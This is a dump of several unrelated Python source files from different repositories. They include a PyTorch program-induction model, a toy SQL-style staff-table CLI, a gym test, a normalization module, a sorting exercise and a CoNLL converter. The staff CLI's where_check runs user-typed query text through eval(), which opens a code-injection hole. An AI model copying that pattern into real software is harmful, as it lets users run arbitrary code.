target_var_embedding = self.dropout(self.elu(self.target_var_key_and_embedding_targetembed_layer(l2_input)))
if self.use_key_as_onehot:
target_type_onehot = self.one_hot(target_type, depth=self.num_argtypes)
num_variables_till_now_onehot = self.one_hot(num_variables_till_now, depth=self.max_num_var)
#target_type_onehot is batch_size x num_argtypes
#num_variables_till_now_onehot is batch_size x max_num_var
target_var_key = torch.cat([target_type_onehot, num_variables_till_now_onehot], dim=1)
else:
target_var_key = self.dropout(self.elu(self.target_var_key_and_embedding_targetkey_layer(l2_input)))
return target_var_key, target_var_embedding
def update_attention(self, static_atten, h, i):
#static_atten is of dimension batch_size x num_var
#h is of dimension batch_size x cell_dim
inputs = torch.cat([static_atten,h.view([self.batch_size,-1])], dim = 1)
new_static_atten = nn.functional.softmax(self.elu(self.update_attention_layer[i](inputs)), dim=-1)
return new_static_atten
def mask_attention(self, static_atten, mask):
#static_atten is of dimension batch_size x num_var
#mask is of dimension batch_size x num_var
masked_atten = torch.mul(static_atten, mask)
num = len(masked_atten.shape)
l1norm = torch.sum(masked_atten, dim=1)
stacked_norm = torch.mul(torch.ones_like(masked_atten, device=self.device),torch.unsqueeze(l1norm,num-1))
masked_atten = torch.where(stacked_norm==0, torch.ones_like(masked_atten, device=self.device), masked_atten)
new_l1_norm = torch.sum(masked_atten, dim=1)
masked_atten = masked_atten/new_l1_norm.view([-1,1])
return masked_atten
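# Illustrative example (hypothetical values): mask_attention([0.2, 0.3, 0.5], mask=[1, 1, 0]) keeps
# [0.2, 0.3, 0.0] and renormalizes it to [0.4, 0.6, 0.0]; if the mask zeroes every entry, the
# all-zero row is replaced by ones and renormalized, i.e. it falls back to a uniform distribution.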
def train(self, feed_dict2):
with torch.no_grad():
self.Reward = torch.tensor(feed_dict2['reward'], dtype=self.dtype_float, device=self.device)
#self.ProgramProb = feed_dict['ProgramProb']
#self.logProgramProb = feed_dict['logProgramProb']
#self.per_step_prob = feed_dict['per_step_prob']
#self.entropy = feed_dict['entropy']
self.IfPosIntermediateReward = torch.tensor(feed_dict2['IfPosIntermediateReward'], dtype=self.dtype_float, device=self.device)
self.mask_IntermediateReward = torch.tensor(feed_dict2['mask_IntermediateReward'], dtype=self.dtype_float, device=self.device)
self.IntermediateReward = torch.tensor(feed_dict2['IntermediateReward'], dtype=self.dtype_float, device=self.device)
self.Relaxed_reward = torch.tensor(feed_dict2['Relaxed_reward'], dtype=self.dtype_float, device=self.device)
overall_step_count = feed_dict2['overall_step_count']
def reinforce():
#mask_cnf = torch.where(self.Reward>0,torch.ones_like(self.Reward),torch.zeros_like(self.Reward))
current_baseline = torch.sum(torch.mul(self.Reward,self.ProgramProb),dim=1,keepdim=True).detach()
#self.Relaxed_reward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size])
current_baseline_relaxed = torch.div(torch.sum(torch.mul(self.Relaxed_reward, self.ProgramProb), dim=1, keepdim=True), torch.sum(self.ProgramProb,dim=1,keepdim=True)).detach()
# from intermediate rewards
#self.IfPosIntermediateReward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size])
self.rate_intermediate_reward = self.params['lr_intermideate_reward']
#self.mask_IntermediateReward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size, self.num_timesteps])
#self.IntermediateReward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size])
int_reward = torch.mul(self.IntermediateReward,self.IfPosIntermediateReward)
prob_intermediate = torch.mul(self.mask_IntermediateReward, self.per_step_prob)
prob_intermediate = torch.where(self.mask_IntermediateReward==0,torch.ones_like(self.mask_IntermediateReward, device=self.device),prob_intermediate)
prob_intermediate = torch.prod(prob_intermediate, dim = 2)
if self.forced_normalize_ir:
len_IntermediateReward = torch.sum(self.mask_IntermediateReward, dim=2)
fraclen_IntermediateReward = (1.0/float(self.num_timesteps))*len_IntermediateReward
prob_intermediate = torch.mul(fraclen_IntermediateReward, prob_intermediate)
log_prob_intermediate = torch.log(prob_intermediate)
unbackpropable_intermediate_prob = prob_intermediate.detach()#requires_grad_(False)
baseline_ir = torch.sum(torch.mul(unbackpropable_intermediate_prob,int_reward), dim = 1, keepdim=True)
#combining stuff
new_baseline = current_baseline + baseline_ir
new_baseline = torch.div(new_baseline,torch.sum(self.ProgramProb,dim=1,keepdim=True)+torch.sum(unbackpropable_intermediate_prob,dim=1,keepdim=True))
#self.OldBaseline = tf.placeholder(tf.float32,[self.batch_size,1])
final_baseline = new_baseline.detach()
#final_baseline = (final_baseline + 0.5*self.OldBaseline)/1.5
#coming back to reinforce_main
scaling_term_1 = torch.mul(self.ProgramProb,self.Reward-final_baseline).detach()
loss_reinforce = torch.mul(self.logProgramProb, scaling_term_1)
# if overall_step_count<=15:
#loss_reinforce = torch.mul(loss_reinforce,mask_cnf)
loss_reinforce = torch.where(torch.isnan(loss_reinforce), torch.zeros_like(loss_reinforce, device=self.device), loss_reinforce)
loss_reinforce = torch.sum(torch.mean(loss_reinforce, dim = 0))
#coming back to intermediate reward part
scaling_term_2 = torch.mul(self.IfPosIntermediateReward,torch.mul((int_reward - final_baseline) ,unbackpropable_intermediate_prob)).detach()
loss_ir = torch.mul(scaling_term_2, log_prob_intermediate)
loss_ir = torch.where(torch.isnan(loss_ir), torch.zeros_like(loss_ir, device=self.device), loss_ir)
loss_ir = torch.sum(torch.mean(loss_ir,dim=0))
relaxed_scaling_term_1 = torch.mul(self.ProgramProb, self.Relaxed_reward-current_baseline_relaxed).detach()
loss_relaxed_reinforce = torch.mul(self.logProgramProb, relaxed_scaling_term_1)
loss_relaxed_reinforce = torch.where(torch.isnan(loss_relaxed_reinforce), torch.zeros_like(loss_relaxed_reinforce, device=self.device),\
loss_relaxed_reinforce)
loss_relaxed_reinforce = torch.sum(torch.mean(loss_relaxed_reinforce,dim=0))
self.entropy = torch.where(torch.isnan(self.entropy), torch.zeros_like(self.entropy, device=self.device), self.entropy)
self.entropy = self.entropy/self.batch_size
loss = loss_reinforce + self.params['Rate_Entropy']*self.entropy + self.rate_intermediate_reward*loss_ir +\
torch.mul(self.relaxed_reward_multipler, loss_relaxed_reinforce)
self.loss = loss
return loss
#val_grad_fn = tfe.value_and_gradients_function(reinforce)#tfe.implicit_gradients(self.reinforce)
#value, grads_and_vars = val_grad_fn()
#print grads_and_vars
#self.optimizer.apply_gradients(grads_and_vars)#feed_dict2))
#return value
return reinforce()
def recursive_joint_prob_generator(self,list_dists):
if len(list_dists) == 2:
dist_1 = list_dists[0].view([-1,1])
dist_2 = list_dists[1].view([-1,1])
out = torch.matmul(dist_1,torch.transpose(dist_2,1,0))
return out
else:
current_dist = list_dists[-1]
#has shape batch_size x max_num_var
new_list_dists = list_dists[0:-1]
probs_list = list(torch.unbind(current_dist, dim = 0))
penultimate_output = self.recursive_joint_prob_generator(new_list_dists)
#has shape batch_size x max_num_var x max_num_var ....
out = []
for prob in probs_list:
#prob is tensor of shape batch_size
out.append(torch.mul(penultimate_output,prob))
return torch.stack(out,dim = len(list_dists)-1)
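# Illustrative example (hypothetical values): as called from input_var_net, each entry of list_dists
# is a single example's 1-D distribution over max_num_var variables, and the result is their outer
# product, e.g. p = (0.5, 0.5) and q = (0.2, 0.8) give [[0.1, 0.4], [0.1, 0.4]].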
def map_index_to_unflattened(self,number,shape):
out = []
for divisor in shape[::-1]:
remainder = torch.remainder(number,divisor).type(self.dtype_int64)  # number % divisor
number = torch.div(number.type(self.dtype_float),float(divisor)).floor_()  # number // divisor
out.append(remainder)
#print 'remainder ', remainder
return out[::-1]
def map_index_to_flattened(self,number, dimensions):
number = number.type(self.dtype_int64)
one = torch.tensor(1,dtype=self.dtype_int64,device=self.device)
dimensions = list(torch.unbind(torch.tensor(dimensions, dtype=self.dtype_int64, device=self.device), dim = 0))
dimensions.append(one)
out = []
for i in range(0,len(dimensions)-1):
out.append(torch.prod(torch.stack(dimensions[i+1:] , dim = 0) ,dim = 0))
out = torch.stack(out)
out = torch.mul(number,out)
out = torch.sum(out, len(number.shape)-1)
return out
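# Illustrative example (hypothetical shape): map_index_to_flattened([2, 1], [3, 4]) gives 2*4 + 1 = 9,
# and map_index_to_unflattened(9, [3, 4]) recovers [2, 1]; the two helpers are inverses of each other
# for indices that lie inside the given shape.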
def immutable_scatter_nd_constant_update(self, inp1, inp2, inp3):
shape = inp1.shape
# inp1 = tf.to_float(inp1)
inp1 = inp1.contiguous().view([-1]) #this reshaping cannot be avoided
inp2 = self.map_index_to_flattened(inp2, shape)
z1 = self.one_hot(inp2, list(inp1.shape)[0], dtype=inp3.dtype)
z2 = inp3.view([-1,1])
z3 = torch.mul(z1,z2)
update_input = torch.sum(z3+torch.zeros_like(inp1, device=self.device, dtype=inp3.dtype),dim = 0)
m1 = torch.sum(z1, dim = 0).type(inp1.dtype)
m1 = 1-m1
new_inp1 = torch.mul(inp1,m1)
out = new_inp1 + update_input.type(new_inp1.dtype)
return out.view(shape)
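# Illustrative example (hypothetical values): for inp1 = zeros(2, 3), indices inp2 = [[0, 1], [1, 2]]
# and updates inp3 = [5., 7.], the result equals inp1 except that position (0, 1) becomes 5. and
# position (1, 2) becomes 7. -- a functional (out-of-place) analogue of a scatter_nd update.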
def immutable_scatter_nd_1d_update(self, inp1, inp2, inp3):
shape = inp1.shape
dim = shape[-1]
index_shape = shape[0:-1]
# inp1 = tf.to_float(inp1)
inp1 = inp1.contiguous().view([dim, -1]) #this reshaping cannot be avoided
inp2 = self.map_index_to_flattened(inp2, index_shape)
z1 = self.one_hot(inp2, inp1.shape[1], dtype=inp3.dtype)
z1 = torch.unsqueeze(torch.transpose(z1,1,0),dim = 2)
z2 = inp3.view([-1,dim])
z3 = torch.mul(z2,z1)
update_input = torch.sum(z3,dim = 1)
m1 = torch.sum(z1, dim = 1)
m1 = 1-m1
inp1 = inp1.view([-1, dim])
new_inp1 = torch.mul(inp1,m1)
out = new_inp1+update_input
return out.view(shape)
def beam_switch(self, old_prop_val, new_beam_ids):
# the matrix should be input in the shape beam_size x batch_size x Tensor_shape
old_shape = old_prop_val.shape
old_prop_val = old_prop_val.contiguous().view([self.beam_size, self.batch_size, -1]) #this reshaping cannot be avoided
new_prop_val = []
expanded_beam_ids = self.one_hot(new_beam_ids, depth = self.beam_size, dtype=old_prop_val.dtype)
#expanded_beam_ids has shape beam_size x batch_size x beam_size
expanded_beam_ids = torch.transpose(expanded_beam_ids,2,1)
for multiplier in list(torch.unbind(expanded_beam_ids,dim=0)):
multiplier = torch.unsqueeze(multiplier,dim=-1)
new_prop_val.append(torch.sum(torch.mul(multiplier,old_prop_val), dim = 0))
new_prop_val = torch.stack(new_prop_val,dim = 0)
new_prop_val = new_prop_val.view(old_shape)
return new_prop_val
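# Illustrative example (hypothetical values): new_beam_ids[k, b] names the old beam whose state should
# occupy slot k for batch element b after re-ranking; e.g. with beam_size = 2 and new_beam_ids[:, b]
# = [1, 0], the two beams' tensors are swapped for that batch element.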
def bernoulli_program_sampling(self,distribution, k):
out1_vals, out1_ind = torch.topk(distribution, k)
if self.params["explore"][0] is -1:
return out1_vals, out1_ind
p = torch.randn([])>self.randomness_threshold_beam_search
p = p.type(self.dtype_float)
# temp = torch.stack([torch.randperm(self.num_progs) for _ in xrange(self.batch_size)],dim=0)
out2_ind = torch.randint_like(out1_ind,0,self.num_progs, device=self.device)#temp[:,0:k]
multiplicand_1 = self.one_hot(out2_ind, depth=self.num_progs)
multiplicand_1 = multiplicand_1.permute([1,0,2])
out2_vals = torch.sum(torch.mul(multiplicand_1.type(distribution.dtype), distribution), dim=2)
out2_vals = out2_vals.permute([1,0])
out_ind = p*out1_ind.type(p.dtype)+(1-p)*out2_ind.type(p.dtype)
out_vals = p*out1_vals+(1-p)*out2_vals
return out_vals, out_ind.type(self.dtype_int64)
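# Note (descriptive only): when exploration is enabled, a single random draw compared against
# randomness_threshold_beam_search decides, for the whole batch, whether to keep the top-k programs
# (p = 1) or to replace them with uniformly sampled program indices and their probabilities (p = 0).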
def one_hot(self,batch,depth,dtype=None):
n_dims = depth
y_tensor = batch
y_tensor = y_tensor.contiguous().view(-1, 1)
y_one_hot = torch.zeros(y_tensor.size()[0], n_dims, dtype = self.dtype_int64, device=self.device).scatter_(1, y_tensor.type(self.dtype_int64), 1)
y_one_hot = y_one_hot.view(*(list(batch.shape)+[-1]))
if dtype is None:
return y_one_hot
return y_one_hot.type(dtype)
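# Illustrative example (hypothetical values): one_hot(tensor([0, 2]), depth=3) returns
# [[1, 0, 0], [0, 0, 1]]; the encoding works for inputs of any shape and appends the depth
# dimension as the last axis.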
# ---- next file: /sql_staff.py (repo: vincenshen01/oldboy-day03, Python, no license) ----
import re,sys,os
from prettytable import PrettyTable
class SQL_Staff(object):
def __init__(self, *args):
self.staff_list = []
self.staff_list2 = []
self.staff_count = 0
self.staff_id = 0
self.syntax = self.syntax_check(args[0]) # syntax check and normalization
def select(self):
staffs_info = self.__data_read(self.syntax[3]) # read the staff records as a list
field_names = self.syntax[1].split(",")
for staff in staffs_info:
self.staff_list = []
staff_dict = self.data_process(staff) # parse the record into a dict
if self.where_check(self.syntax,staff_dict): # evaluate the where condition
for field in field_names:
self.staff_list.append(staff_dict.get(field))
self.staff_list2.append(self.staff_list)
self.staff_count += 1
self.pt_staff_data(field_names,self.staff_list2) # pretty-print the matched staff records
print("Found %d matching record(s)!" %self.staff_count)
def update(self):
staffs_info = self.__data_read(self.syntax[1]) # read the staff records as a list
for staff in staffs_info:
staff_dict = self.data_process(staff) # parse the record into a dict
if self.where_check(self.syntax,staff_dict): # evaluate the where condition
update_set = self.syntax[3].split("=")
if "\"" in update_set[1]:
staff_dict[update_set[0]] = update_set[1][1:-1]
else:
staff_dict[update_set[0]] = update_set[1]
self.staff_count += 1
self.staff_list.append(self.staff_info_str(staff_dict)) # convert the dict back to a string
self.__data_write(self.syntax[1],self.staff_list) # write the data back to the file
print("Done, %d record(s) updated!" %self.staff_count)
def delete(self):
staff_info = self.__data_read(self.syntax[2]) # read the staff records as a list
for staff in staff_info:
self.staff_id += 1
staff_dict = self.data_process(staff) # parse the record into a dict
if self.where_check(self.syntax,staff_dict): # evaluate the where condition
self.staff_count += 1
self.staff_id -= 1
continue
else:
staff_dict['staff_id'] = str(self.staff_id) # renumber staff_id
self.staff_list.append(self.staff_info_str(staff_dict)) # convert the dict back to a string
self.__data_write(self.syntax[2],self.staff_list) # write the data back to the file
print("Done, %d record(s) deleted!" %self.staff_count)
def insert(self):
staff_info = self.__data_read(self.syntax[2]) # read the staff records as a list
staff_values = re.split(r',',self.syntax[4])
for i in range(len(staff_values)): # strip surrounding quotes
if "\"" in staff_values[i]:
staff_values[i] = staff_values[i].strip("\"")
for staff in staff_info:
staff_dict = self.data_process(staff) # parse the record into a dict
if staff_values[2] in staff:
print("Staff phone already exists; duplicate values are not allowed!")
return
else:
self.staff_list.append(self.staff_info_str(staff_dict)) # convert the dict back to a string
self.staff_list.append(",".join([str(len(staff_info)+1),staff_values[0],staff_values[1],staff_values[2],staff_values[3],staff_values[4]])) # append the new staff record to the end of the list
self.__data_write(self.syntax[2],self.staff_list) # write the data back to the file
print("Inserted 1 record!")
def __data_read(self,file_name): # read the file and return its lines as a list
staff_info = []
with open(file_name,"r",encoding="utf-8") as f:
for line in f.readlines():
staff_info.append(line.strip())
return staff_info
def __data_write(self,file_name,staff_info): # join the list into a string and write it back to the file
staff_str = ""
with open(file_name,"w",encoding="utf-8") as f:
for line in staff_info:
staff_str += str(line) + "\n"
f.write(staff_str)
def data_process(self,data): # convert a staff record into a dict
student_info = data.split(',')
staff_dict = {'staff_id': student_info[0], 'name': student_info[1], 'age': student_info[2],
'phone': student_info[3], 'dept': student_info[4], 'enroll_date': student_info[5]}
return staff_dict
def pt_staff_data(self,fields_names,staff_data): # formatted (pretty-table) printing
pt_info = PrettyTable()
pt_info.field_names = fields_names
for staff in staff_data:
pt_info.add_row(staff)
print(pt_info)
def syntax_check(self,syntax): # check the syntax structure and normalize it
if (syntax[2].lower() == "from" or syntax[2].lower() == "set")\
and syntax[4].lower() == "where" and len(syntax) == 8:
if "\"" in syntax[7]:
syntax[7] = syntax[7][1:-1]
if syntax[1] == "*":
syntax[1] = "staff_id,name,age,phone,dept,enroll_date"
return syntax
elif syntax[1].lower() == "from" and syntax[3].lower() == "where" and len(syntax) == 7:
if "\"" in syntax[6]:
syntax[6] = syntax[6][1:-1]
return syntax
elif syntax[1].lower() == "into" and syntax[3].lower() == "values":
syntax[4] = syntax[4][1:-1]
return syntax
else:
sys.exit("语句错误,请重试!")
def where_check(self,syntax,staff_dict): # check whether the where condition holds
try:
if len(syntax) == 8 and ((syntax[6] == "like" and ((syntax[7]) in staff_dict[syntax[5]])) or \
(syntax[6] == "=" and syntax[7] == staff_dict[syntax[5]]) or \
((syntax[6] not in ["=", "like"]) and eval(staff_dict[syntax[5]] + syntax[6] + syntax[7]))):
return True
if len(syntax) == 7 and ((syntax[5] == "like" and ((syntax[6]) in staff_dict[syntax[4]])) or \
(syntax[5] == "=" and syntax[6] == staff_dict[syntax[4]]) or \
((syntax[5] not in ["=","like"]) and eval(staff_dict[syntax[4]]+syntax[5]+syntax[6]))):
return True
except Exception as e:
            sys.exit("Invalid field name, please try again!!!")
    def staff_info_str(self,staff_dict): # convert the dict back into a CSV string
staff_info= [staff_dict['staff_id'], staff_dict['name'], staff_dict['age'],staff_dict['phone'], staff_dict['dept'],staff_dict['enroll_date']]
return ",".join(staff_info)
if os.path.isfile("staff_table") == False:
staff_lists = [
"1,李啸宇,22,13564081679,运维,2017-01-01",
"2,高君,29,13911523752,IT,2014-08-02",
"3,徐鹏,25,13811436953,运维,2015-01-01",
"4,王耀华,77,13461044075,实习生,1937-01-21",
"5,李家旺,69,17191195862,实习生,2017-01-21",
"6,李西昌,27,17733786749,运维,2017-01-21",
"7,李梦林,26,15910631989,QA,2016-10-11",
"8,朱世阳,24,17744498194,运维,2017-01-07",
"9,范洪涛,22,18611044558,运维,2017-01-01",
"10,沈洪斌,29,18518740102,运维,2016-10-12",
"11,李向阳,24,13622004447,运维,2017-01-01",
"12,曲喆,42,18911324106,DBA,2017-01-20",
"13,郭奇锋,26,18211144618,自动化测试,2017-01-15",
"14,邱峰,30,18910627886,运维,2000-01-01",
"15,贺磊,30,18500644534,开发,1998-07-01"
]
staff_str = ""
with open("staff_table", "w", encoding="utf-8") as f:
for line in staff_lists:
staff_str += str(line) + "\n"
f.write(staff_str)
if __name__ == '__main__':
    sql_doc = '''
    Examples of the supported SQL syntax:
    * Select: select staff_id,name,age from staff_table where age > 22
              select * from staff_table where enroll_date like "2017"
              select * from staff_table where name = "沈洪斌"
    * Update: update staff_table set dept="IT" where name = "沈洪斌"
    * Insert: insert into staff_table values ("Alex",33,13812345678,"讲师",2010-01-01)
    * Delete: delete from staff_table where staff_id = 4
    '''
print(sql_doc)
while True:
        sql_input = input("Please input SQL or exit() to quit >>>").strip()
if len(sql_input) == 0:
continue
elif sql_input == "exit()":
sys.exit("Bye!")
try:
sql_list = re.split(r'\s+',sql_input)
sql_func = SQL_Staff(sql_list)
getattr(sql_func,sql_list[0].lower())()
except AttributeError as e:
            print("Invalid statement, please try again!!")
author: vincen_shen01@163.com
file: /tests/env_test.py | repo: koulanurag/gym_x | license: no_license
import gym, gym_x
import os
import random
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='test env')
parser.add_argument('--env', default='GoldRushRead-v0', help="Name of the environment")
args = parser.parse_args()
env = gym.make(args.env)
env.seed(0)
done = False
for ep in range(100):
done = False
obs = env.reset()
action = env.env.get_desired_action()
total_reward = 0
all_observations = [obs]
all_actions = [action]
while not done:
obs, reward, done, info = env.step(action)
action = env.env.get_desired_action()
total_reward += reward
if not done:
all_observations.append(obs)
all_actions.append(action)
print('Episode: {} Total Reward: {} Obs: {}, Action: {}'.format(ep, total_reward,
''.join([str(_[0]) for _ in all_observations]),
all_actions))
author: koulanurag@gmail.com
file: /padertorch/contrib/je/modules/norm.py | repo: FrederikRautenberg/padertorch | license: MIT
import torch
from padertorch.base import Module
from torch import nn
from torch.autograd import Function
from padertorch.contrib.je.modules.global_pooling import compute_mask
class Norm(Module):
"""
>>> norm = Norm(data_format='bct', shape=(None, 10, None), statistics_axis='bt', momentum=0.5, interpolation_factor=1.)
>>> x, seq_len = 2*torch.ones((3,10,4)), [1, 2, 3]
>>> norm.running_mean
tensor([[[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.]]])
>>> norm.running_power
tensor([[[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.]]])
>>> x = norm(x, seq_len)
>>> norm.running_mean
tensor([[[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.]]])
>>> norm.running_power
tensor([[[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000]]])
"""
def __init__(
self,
data_format='bcft',
shape=None,
*,
statistics_axis='bft',
independent_axis='c',
batch_axis='b',
sequence_axis='t',
shift=True,
scale=True,
eps: float = 1e-3,
momentum=0.95,
interpolation_factor=0.,
):
super().__init__()
self.data_format = data_format.lower()
self.batch_axis = None if batch_axis is None \
else data_format.index(batch_axis.lower())
self.sequence_axis = None if sequence_axis is None \
else data_format.index(sequence_axis.lower())
self.statistics_axis = tuple(
[data_format.index(ax.lower()) for ax in statistics_axis]
)
self.shift = shift
self.scale = scale
self.eps = eps
self.track_running_stats = batch_axis in statistics_axis
if self.track_running_stats:
reduced_shape = [*shape]
for ax in self.statistics_axis:
reduced_shape[ax] = 1
assert not any([d is None for d in reduced_shape])
self.register_buffer(
'num_tracked_values', torch.zeros(reduced_shape)
)
if shift:
self.register_buffer('running_mean', torch.zeros(reduced_shape))
else:
self.register_parameter('running_mean', None)
if scale:
self.register_buffer('running_power', torch.ones(reduced_shape))
else:
self.register_parameter('running_power', None)
else:
self.register_parameter('num_tracked_values', None)
self.register_parameter('running_mean', None)
self.register_parameter('running_power', None)
self.momentum = momentum
assert 0. <= interpolation_factor <= 1., interpolation_factor
self.interpolation_factor = interpolation_factor
if independent_axis is not None:
reduced_shape = len(data_format) * [1]
for ax in independent_axis:
ax = data_format.index(ax.lower())
assert shape[ax] is not None, shape[ax]
reduced_shape[ax] = shape[ax]
if scale:
self.gamma = nn.Parameter(
torch.ones(reduced_shape), requires_grad=True
)
else:
self.gamma = None
if self.shift:
self.beta = nn.Parameter(
torch.zeros(reduced_shape), requires_grad=True
)
else:
self.beta = None
else:
self.gamma = None
self.beta = None
@property
    def running_var(self):
n = torch.max(self.num_tracked_values, 2. * torch.ones_like(self.num_tracked_values))
running_var = self.running_power
if self.shift:
running_var = n / (n-1) * (running_var - self.running_mean ** 2)
running_var = running_var + self.eps
assert (running_var >= 0).all(), running_var.min()
return running_var
def reset_running_stats(self):
if self.track_running_stats:
self.num_tracked_values.zero_()
if self.shift:
self.running_mean.zero_()
if self.scale:
self.running_power.fill_(1)
def reset_parameters(self):
self.reset_running_stats()
if self.gamma is not None:
            nn.init.ones_(self.gamma)
if self.beta is not None:
            nn.init.zeros_(self.beta)
def forward(self, x, seq_len=None):
if self.training or not self.track_running_stats:
y, mean, power, n_values = normalize(
x, gamma=self.gamma, beta=self.beta,
statistics_axis=self.statistics_axis,
batch_axis=self.batch_axis, sequence_axis=self.sequence_axis,
seq_len=seq_len, shift=self.shift, scale=self.scale,
eps=self.eps
)
if self.track_running_stats:
self.num_tracked_values += n_values.data
if self.momentum is None:
momentum = 1 - n_values / self.num_tracked_values.data
else:
momentum = self.momentum
if self.shift:
self.running_mean *= momentum
self.running_mean += (1 - momentum) * mean.data
power = power.data + mean.data ** 2
if self.scale:
self.running_power *= momentum
self.running_power += (1 - momentum) * power.data
if self.interpolation_factor > 0.:
# perform straight through backpropagation
# https://arxiv.org/pdf/1611.01144.pdf
y_ = x
if self.shift:
y_ = y_ - self.running_mean
if self.scale:
                    y_ = y_ / torch.sqrt(self.running_var)
y = y + self.interpolation_factor * (y_ - y).detach()
y = y * compute_mask(x, seq_len, self.batch_axis, self.sequence_axis)
else:
y = x
if self.shift:
y = y - self.running_mean.data
if self.scale:
                y = y / torch.sqrt(self.running_var)
if self.gamma is not None:
y = y * self.gamma
if self.beta is not None:
y = y + self.beta
y = y * compute_mask(x, seq_len, self.batch_axis, self.sequence_axis)
return y
def inverse(self, x):
if not self.track_running_stats:
raise NotImplementedError
if self.beta is not None:
x = x - self.beta
if self.gamma is not None:
x = x / self.gamma
if self.scale:
x = torch.sqrt(self.running_var) * x
if self.shift:
x = x + self.running_mean
return x
class Normalize(Function):
@staticmethod
def forward(ctx, x, gamma, beta, statistics_axis, batch_axis, sequence_axis, seq_len, shift, scale, eps):
ctx.statistics_axis = statistics_axis
ctx.batch_axis = batch_axis
ctx.sequence_axis = sequence_axis
ctx.seq_len = seq_len
ctx.shift = shift
ctx.scale = scale
ctx.eps = eps
# compute mask
if seq_len is not None:
mask = compute_mask(x, seq_len, batch_axis, sequence_axis)
else:
mask = torch.ones_like(x)
# compute statistics
n_values = mask.sum(dim=statistics_axis, keepdim=True)
x = x * mask
mean = x.sum(dim=statistics_axis, keepdim=True) / torch.max(n_values, torch.ones_like(n_values))
power = (x ** 2).sum(dim=statistics_axis, keepdim=True) / torch.max(n_values, torch.ones_like(n_values))
y = x
if shift:
y = y - mean
power = power - mean**2
if scale:
y = y / torch.sqrt(power + eps)
ctx.save_for_backward(x, gamma, beta, mean, power)
if gamma is not None:
assert gamma.dim() == x.dim(), gamma.shape
y = y * gamma
if beta is not None:
assert beta.dim() == x.dim(), beta.shape
y = y + beta
return y*mask, mean, power, n_values
@staticmethod
def backward(ctx, grad_y, grad_mean, grad_power, _):
if (grad_mean != 0).any() or (grad_power != 0).any():
raise NotImplementedError
x, gamma, beta, mean, power = ctx.saved_tensors
# compute mask
if ctx.seq_len is not None:
mask = compute_mask(x, ctx.seq_len, ctx.batch_axis, ctx.sequence_axis)
else:
mask = torch.ones_like(x)
n_values = mask.sum(dim=ctx.statistics_axis, keepdim=True)
grad_y = grad_y * mask
x_hat = x
scale = torch.sqrt(power + ctx.eps)
        if ctx.shift:
            x_hat = x_hat - mean
if ctx.scale:
x_hat = x_hat / scale
if beta is None:
grad_beta = None
else:
reduce_axis = [i for i in range(beta.dim()) if beta.shape[i] == 1]
grad_beta = grad_y.sum(reduce_axis, keepdim=True)
if gamma is None:
grad_gamma = None
grad_x_hat = grad_y
else:
reduce_axis = [i for i in range(gamma.dim()) if gamma.shape[i] == 1]
grad_gamma = (grad_y * x_hat).sum(reduce_axis, keepdim=True)
grad_x_hat = grad_y * gamma
if ctx.shift:
x = (x - mean) * mask
grad_mean_ = -grad_x_hat.sum(ctx.statistics_axis, keepdim=True)
if ctx.scale:
grad_power_ = (grad_x_hat * x).sum(ctx.statistics_axis, keepdim=True) * (-1 / 2) * (power + ctx.eps) ** (-3 / 2)
if ctx.shift:
grad_mean_ = (
grad_mean_ / scale
- 2 * grad_power_ * x.sum(ctx.statistics_axis, keepdim=True) / n_values
)
grad_x = grad_x_hat
if ctx.scale:
grad_x = grad_x / scale + grad_power_ * 2 * x / n_values
if ctx.shift:
grad_x = grad_x + grad_mean_ / n_values
return grad_x * mask, grad_gamma, grad_beta, None, None, None, None, None, None, None
def normalize(x, gamma, beta, statistics_axis, batch_axis, sequence_axis, seq_len, shift, scale, eps):
"""
>>> x, seq_len = 2*torch.ones((3,10,4)), [1, 2, 3]
>>> x, m, p, n = normalize(x, None, None, [0, 2], 0, 2, seq_len, True, True, 1e-3)
>>> m
tensor([[[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.]]])
>>> p
tensor([[[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.]]])
>>> n
tensor([[[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.]]])
"""
return Normalize.apply(x, gamma, beta, statistics_axis, batch_axis, sequence_axis, seq_len, shift, scale, eps)
class PrintGrad(Function):
@staticmethod
def forward(ctx, input, i=0):
ctx.i = i
return input
@staticmethod
def backward(ctx, grad_output):
print(ctx.i, grad_output.max().item())
assert not torch.isnan(grad_output).any()
return grad_output, None
author: ebbers@nt.upb.de
file: /sem1/alglabs/lab2.py | repo: Aneryd/labs | license: no_license
from random import randint
def insertion_sort(nums):
n = 0
for i in range(1, len(nums)):
item_to_insert = nums[i]
j = i - 1
n += 1
while j >= 0 and nums[j] > item_to_insert:
nums[j + 1] = nums[j]
j -= 1
nums[j + 1] = item_to_insert
lists = [2, 0, 11, 4, 23, 1, 3, 41, 23, 5, 24, 54, 76, 14, 99]
print(lists)
n = 0
insertion_sort(lists)
print(lists)
for i in range(len(lists)):
n += 1
if n == 5:
lists.insert(5, 0)
elif n == 10:
lists.insert(11, 0)
elif n == 15:
lists.insert(17, 0)
print(lists)
author: andrey.zhalo@mail.ru
file: /code/contextual_embeddings/ner2disrpt.py | repo: mortezaezzabady/discut | license: no_license
"""
maps conll 2003 format (4 fields) to Disrpt expected conll formats (10 fields)
"""
import sys
maptags = {"_":"O",
"BeginSeg=Yes": "B-S",
"Seg=B-Conn":"B-Conn",
"Seg=I-Conn":"I-Conn",
"SpaceAfter=No":"O",
"Typo=Yes":"O",
}
inv_map_tags = {maptags[k]:k for k in maptags}
inv_map_tags["O"]="_"
with open(sys.argv[1]) as f:
output = []
idx = 1
for line in f:
if line.strip()=="":
output.append("")
idx = 1
else:
token, pos, chk, label = line.strip().split()
newline = [str(idx),token]+["_"]*7+[inv_map_tags[label]]
idx = idx + 1
output.append("\t".join(newline))
print("\n".join(output))
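# Illustrative mapping (hedged: the token below is a made-up example, not taken from any
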